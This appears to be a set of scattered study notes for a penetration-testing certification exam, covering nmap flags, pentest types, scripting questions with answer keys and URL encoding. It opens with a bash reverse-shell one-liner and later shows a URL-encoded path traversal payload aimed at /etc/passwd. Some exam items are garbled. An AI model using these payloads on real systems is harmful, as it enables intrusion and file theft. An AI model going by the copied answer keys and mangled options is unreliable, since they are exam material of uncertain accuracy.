bash -i >& /dev/tcp/192.168.0.1/80 0> &1
opens a remote shell to 192.168.0.1:80
SIMULATION -
You are a penetration tester running port scans on a server.
INSTRUCTIONS -
Part1: Given the output, construct the command that was used to generate this output from the available options.
Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
So you can see in the output it says “OS and Service detection performed” ( aka -sV and -O)
by default nmap scans the top 1000 ports so they had to specifiy –top-ports 100, it shows 4 ports and at the top of the output says 96 closed ports.
The art of packet crafting can be divided into four phases
packet….
Goal-based Pentest
attempt to achieve specific goals
Objective Based Pentest
uses all methods - accurately simulates a real attack
Compliance-based pentest
objectives are clearly defined.
Red Team
pentest conducted by internal pentesters during exercise to ensure defenders (Blue Team) can do their jobs
https://www.examtopics.com/exams/comptia/pt0-001/view/4/
NIST SP 800 Methodology
Planning, Discovery, Attack, Reporting (PDAR)
Given the output from the console above, which of the following explains how to correct the errors in the script? (Select
TWO)
A. Change fi\’ to \‘Endlf
B. Remove the \‘let\’ in front of \‘dest=5+5\’.
C. Change the \’=” to \‘-eq\’.
D. Change -Source* and \‘dest\’ to “$source” and “$dest”
E. Change \‘else\’ to \‘elif.
B,D
URL Encoding
. == %2E
/ == %2F
\ == %5C
eg:
http://www.companysite.com/about.php?i=%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
1 = #1/usr/bin/python 2 = ports = [21,22] 3 = for port in ports: 4 = port_scan(sys.argv[1], ports)
password complexity
Zverlory
zv3rl0ry
Zverl0ry
Zv3r!0ry
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
nist
nsrt
imdA
strat